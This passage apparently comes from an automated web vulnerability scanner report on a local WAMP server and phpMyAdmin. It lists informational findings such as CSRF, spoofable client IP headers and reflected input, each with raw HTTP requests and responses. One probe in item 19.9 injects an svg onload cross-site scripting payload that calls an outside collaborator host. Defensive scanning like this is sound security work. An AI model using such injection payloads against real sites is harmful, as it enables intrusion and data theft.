       <meta charset="UTF-8">
       <style>
           * {
               margin: 0;
               padding: 0;
           }

           html {
               background:
...[SNIP]...
15.2. http://localhost/phpmyadmin/index.php

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right; however, it may facilitate exploitation of other vulnerabilities affecting application users.

The original request contains parameters that look like they may be anti-CSRF tokens. However, the request is successful if these parameters are removed.

Request 1

POST /phpmyadmin/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Cookie: pma_lang=en; phpMyAdmin=1bg782nlrv2jgqql6iul04nac0

set_session=1bg782nlrv2jgqql6iul04nac0&pma_username=IRyDYmDn&pma_password=p9A%21a6t%21D6&server=1&target=index.php&lang=en&token=YV%2cge%5dj%243LyLHn*%7f

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:47 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=arhr9tg2gf5cpmqke7p91fbucm; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:01:59 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:01:59 +0000
Set-Cookie: phpMyAdmin=arhr9tg2gf5cpmqke7p91fbucm; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=ah67mqmknen309knsjn9k66qvf; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14587
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...

Request 2

POST /phpmyadmin/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://SchTt.com/phpmyadmin/
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Cookie: pma_lang=en; phpMyAdmin=1bg782nlrv2jgqql6iul04nac0; security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

set_session=1bg782nlrv2jgqql6iul04nac0&pma_username=IRyDYmDn&pma_password=p9A%21a6t%21D6&server=1&target=index.php&lang=en&token=YV%2cge%5dj%243LyLHn*%7f

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:24:43 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=vfugbduu7cc6smhnf50dv891po; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:24:44 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:24:44 +0000
Set-Cookie: phpMyAdmin=vfugbduu7cc6smhnf50dv891po; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=ie536fvh2ai6iso9olfkr8e56k; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14593
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
16. Referer-dependent response

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /

Issue description

Application responses may depend systematically on the presence or absence of the Referer header in requests. This behavior does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build access controls. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the content of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kind of user-supplied data.

Request 1

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 108719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">localhost </td></tr>
<tr><td class="e">SERVER_ADDR </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">SERVER_PORT </td><td class="v">80 </td></tr>
<tr><td class="e">REMOTE_ADDR </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">DOCUMENT_ROOT </td><td class="v">C:/wamp64/www </td></tr>
<tr><td class="e">REQUEST_SCHEME </td><td class="v">http </td></tr>
<tr><td class="e">CONTEXT_PREFIX </td><td class="v">
<i>
...[SNIP]...
</th></tr>
<tr><td class="e">HTTP Request </td><td class="v">GET /?phpinfo=-1 HTTP/1.1 </td></tr>
<tr><td class="e">Host </td><td class="v">localhost </td></tr>
<tr><td class="e">Accept-Encoding </td><td class="v">gzip, deflate </td></tr>
<tr><td class="e">Accept </td><td class="v">*/* </td></tr>
<tr><td class="e">Accept-Language </td><td class="v">en </td></tr>
<tr><td class="e">User-Agent </td><td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) </td>
</tr>
...[SNIP]...
</th></tr>
<tr><td class="e">$_REQUEST['phpinfo']</td><td class="v">-1</td></tr>
<tr><td class="e">$_GET['phpinfo']</td><td class="v">-1</td></tr>
<tr><td class="e">$_COOKIE['security']</td><td class="v">low</td></tr>
<tr><td class="e">$_COOKIE['PHPSESSID']</td><td class="v">ijpljt3jfnhra9b1smq3cka20p</td></tr>
<tr><td class="e">$_SERVER['HTTP_HOST']</td><td class="v">localhost</td></tr>
<tr><td class="e">$_SERVER['HTTP_ACCEPT_ENCODING']</td><td class="v">gzip, deflate</td>
</tr>
...[SNIP]...

Request 2

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
17. Spoofable client IP address

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /

Issue description

If an application trusts an HTTP request header like X-Forwarded-For to accurately specify the remote IP address of the connecting client, then malicious clients can spoof their IP address. This behavior does not necessarily constitute a security vulnerability; however, some applications use client IP addresses to enforce access controls and rate limits. For example, an application might expose administrative functionality only to clients connecting from the local IP address of the server, or allow a certain number of failed login attempts from each unique IP address. Consider reviewing relevant functionality to determine whether this might be the case.

Issue remediation

HTTP request headers such as X-Forwarded-For, True-Client-IP, and X-Real-IP are not a robust foundation on which to build any security measures, such as access controls. Any such measures should be replaced with more secure alternatives that are not vulnerable to spoofing.

If the platform application server returns incorrect information about the client's IP address due to the presence of any particular HTTP request header, then the server may need to be reconfigured, or an alternative method of identifying clients should be used.

Request 1

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 108719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">80 </td></tr>
<tr><td class="e">REMOTE_ADDR </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">DOCUMENT_ROOT </td><td class="v">C:/wamp64/www </td></tr>
<tr><td class="e">REQUEST_SCHEME </td><td class="v">http </td></tr>
<tr><td class="e">CONTEXT_PREFIX </td><td class="v">
<i>
...[SNIP]...
</th></tr>
<tr><td class="e">HTTP Request </td><td class="v">GET /?phpinfo=-1 HTTP/1.1 </td></tr>
<tr><td class="e">Host </td><td class="v">localhost </td></tr>
<tr><td class="e">Accept-Encoding </td><td class="v">gzip, deflate </td></tr>
<tr><td class="e">Accept </td><td class="v">*/* </td>
</tr>
...[SNIP]...
</th></tr>
<tr><td class="e">$_REQUEST['phpinfo']</td><td class="v">-1</td></tr>
<tr><td class="e">$_GET['phpinfo']</td><td class="v">-1</td></tr>
<tr><td class="e">$_COOKIE['security']</td><td class="v">low</td></tr>
<tr><td class="e">$_COOKIE['PHPSESSID']</td><td class="v">ijpljt3jfnhra9b1smq3cka20p</td>
</tr>
...[SNIP]...

Request 2

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/
X-Forwarded-For: 127.0.0.1

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
18. User agent-dependent response

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://localhost
Path:   /

Issue description

Application responses may depend systematically on the value of the User-Agent header in requests. This behavior does not itself constitute a security vulnerability, but may point towards additional attack surface within the application, which may contain vulnerabilities.

This behavior often arises because applications provide different user interfaces for desktop and mobile users. Mobile interfaces have often been less thoroughly tested for vulnerabilities such as cross-site scripting, and often have simpler authentication and session handling mechanisms that may contain problems that are not present in the full interface.

To review the interface provided by the alternate User-Agent header, you can configure a match/replace rule in Proxy to modify the User-Agent header in all requests, and then browse the application in the normal way using your normal browser.

Request 1

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 108719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) </td>
...[SNIP]...
<td class="v">security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p </td></tr>
<tr><td class="e">HTTP_X_ORIGINATING_IP </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">HTTP_X_FORWARDED_FOR </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">HTTP_X_REMOTE_IP </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">HTTP_X_REMOTE_ADDR </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">HTTP_X_CLIENT_IP </td><td class="v">127.0.0.1
</td>
...[SNIP]...
<td class="v">54976 </td>
...[SNIP]...
<td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) </td>
...[SNIP]...
<td class="v">security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p </td></tr>
<tr><td class="e">X-Originating-IP </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">X-Forwarded-For </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">X-Remote-IP </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">X-Remote-Addr </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">X-Client-IP </td><td class="v">127.0.0.1
</td>
...[SNIP]...
<td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</td>
...[SNIP]...
<td class="v">security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p</td></tr>
<tr><td class="e">$_SERVER['HTTP_X_ORIGINATING_IP']</td><td class="v">127.0.0.1</td></tr>
<tr><td class="e">$_SERVER['HTTP_X_FORWARDED_FOR']</td><td class="v">127.0.0.1</td></tr>
<tr><td class="e">$_SERVER['HTTP_X_REMOTE_IP']</td><td class="v">127.0.0.1</td></tr>
<tr><td class="e">$_SERVER['HTTP_X_REMOTE_ADDR']</td><td class="v">127.0.0.1</td></tr>
<tr><td class="e">$_SERVER['HTTP_X_CLIENT_IP']</td><td class="v">127.0.0.1
</td>
...[SNIP]...
<td class="v">54976</td>
...[SNIP]...
<td class="v">1539896499.792</td>
...[SNIP]...
<td class="v">1539896499</td>
...[SNIP]...

Request 2

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Connection: close
Referer: http://localhost/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:05:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 </td>
...[SNIP]...
<td class="v">59391 </td>
...[SNIP]...
<td class="v">Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 </td>
...[SNIP]...
<td class="v">Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3</td>
...[SNIP]...
<td class="v">59391</td>
...[SNIP]...
<td class="v">1539896741.358</td>
...[SNIP]...
<td class="v">1539896741</td>
...[SNIP]...
19. Input returned in response (reflected)

There are 381 instances of this issue:

Issue background

Reflection of input arises when data is copied from a request and echoed into the application's immediate response.

Input being returned in application responses is not a vulnerability in its own right. However, it is a prerequisite for many client-side vulnerabilities, including cross-site scripting, open redirection, content spoofing, and response header injection. Additionally, some server-side vulnerabilities such as SQL injection are often easier to identify and exploit when input is returned in responses. In applications where input retrieval is rare and the environment is resistant to automated testing (for example, due to a web application firewall), it might be worth subjecting instances of it to focused manual testing.

19.1. http://localhost/ [Referer HTTP header]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the application's response.

Request 1

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/vjj355e9a0

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:40 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">http://localhost/vjj355e9a0 </td>
...[SNIP]...
<td class="v">http://localhost/vjj355e9a0 </td>
...[SNIP]...
<td class="v">http://localhost/vjj355e9a0</td>
...[SNIP]...
19.2. http://localhost/ [User-Agent HTTP header]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into the application's response.

Request 1

GET /?phpinfo=-1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)hiorys1h29
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)hiorys1h29 </td>
...[SNIP]...
<td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)hiorys1h29 </td>
...[SNIP]...
<td class="v">Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)hiorys1h29</td>
...[SNIP]...
19.3. http://localhost/ [lang parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The value of the lang request parameter is copied into the application's response.

Request 1

GET /?lang=czechal0cvq1gr3 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 5586
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
   <title>WAMPSERVER Homepage</title>
   <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=de
...[SNIP]...
<a href='add_vhost.php?lang=czechal0cvq1gr3'>
...[SNIP]...
19.4. http://localhost/ [name of an arbitrarily supplied URL parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request 1

GET /?phpinfo=-1&951zddc7ky=1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">phpinfo=-1&amp;951zddc7ky=1 </td>
...[SNIP]...
<td class="v">/?phpinfo=-1&amp;951zddc7ky=1 </td>
...[SNIP]...
<td class="v">GET /?phpinfo=-1&amp;951zddc7ky=1 HTTP/1.1 </td>
...[SNIP]...
<td class="e">$_REQUEST['951zddc7ky']</td>
...[SNIP]...
<td class="e">$_GET['951zddc7ky']</td>
...[SNIP]...
<td class="v">phpinfo=-1&amp;951zddc7ky=1</td>
...[SNIP]...
<td class="v">/?phpinfo=-1&amp;951zddc7ky=1</td>
...[SNIP]...
19.5. http://localhost/ [phpinfo parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The value of the phpinfo request parameter is copied into the application's response.

Request 1

GET /?phpinfo=-1qw8g47wtwb HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:42 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 107730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="v">phpinfo=-1qw8g47wtwb </td>
...[SNIP]...
<td class="v">/?phpinfo=-1qw8g47wtwb </td>
...[SNIP]...
<td class="v">GET /?phpinfo=-1qw8g47wtwb HTTP/1.1 </td>
...[SNIP]...
<td class="v">-1qw8g47wtwb</td>
...[SNIP]...
<td class="v">-1qw8g47wtwb</td>
...[SNIP]...
<td class="v">phpinfo=-1qw8g47wtwb</td>
...[SNIP]...
<td class="v">/?phpinfo=-1qw8g47wtwb</td>
...[SNIP]...
19.6. http://localhost/add_vhost [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /add_vhost

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /add_vhostu4d22ubbo8 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 302
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /add_vhostu4d22ubbo8 was not found on this server.</p>
...[SNIP]...
19.7. http://localhost/add_vhost.php [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /add_vhost.php

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /add_vhost.php2q9bysqxau HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 306
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /add_vhost.php2q9bysqxau was not found on this server.</p>
...[SNIP]...
19.8. http://localhost/add_vhost.php [lang parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /add_vhost.php

Issue detail

The value of the lang request parameter is copied into the application's response.

Request 1

GET /add_vhost.php?lang=englishl33zcun5ai HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/add_vhost.php?lang=english
Cookie: PHPSESSID=tufmlll3341349udhaahv635hv

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:33 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4982
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="fr">
   <head>
       <title>Ajouter un "Virtual Host"</title>
       <meta charset="UTF-8">
       <style>
           * {
               margin: 0;
               padding: 0;
           }

           html {
               background:
...[SNIP]...
<a href="add_vhost.php?lang=englishl33zcun5ai">
...[SNIP]...
<a href="index.php?lang=englishl33zcun5ai">
...[SNIP]...
19.9. http://localhost/add_vhost.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /add_vhost.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request 1

GET /add_vhost.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f%2faycdowl4l1exqvr83lsjus1ktbz6n1bt1hv4msb%5c56burpcollaborator.net'%3e?lang=english HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/add_vhost.php?lang=english
Cookie: PHPSESSID=tufmlll3341349udhaahv635hv

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:28 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 410
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
